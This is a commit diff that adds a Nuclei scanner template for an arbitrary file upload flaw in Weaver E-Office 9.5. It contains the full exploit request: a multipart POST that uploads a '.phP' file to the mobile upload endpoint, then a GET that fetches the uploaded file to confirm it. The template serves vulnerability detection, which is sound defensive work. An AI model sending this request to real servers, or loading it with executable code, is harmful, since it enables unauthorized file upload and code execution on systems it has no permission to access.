Create weaver-eoffice-file-upload.yaml

http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml

@@ -0,0 +1,56 @@
+id: weaver-eoffice-file-upload
+
+info:
+  name: Weaver E-Office v9.5 - Arbitrary File Upload
+  author: princechaddha
+  severity: high
+  description: |
+    Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
+  reference:
+    - https://github.com/RCEraser/cve/blob/main/Weaver.md
+  tags: e-office,weaver,intrusive,fileupload
+
+variables:
+  filename: '{{rand_base(7, "abc")}}'
+
+http:
+  - raw:
+      - |
+        POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Content-Disposition: form-data; name="upload_quwan"; filename="{{filename}}.phP"
+        Content-Type: image/jpeg
+
+        {{randstr}}
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Content-Disposition: form-data; name="file"; filename=""
+        Content-Type: application/octet-stream
+
+
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
+
+      - |
+        GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '{{randstr}}'
+
+    extractors:
+      - type: regex
+        name: id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '\\\/attachment\\\/([0-9]+)\\\/'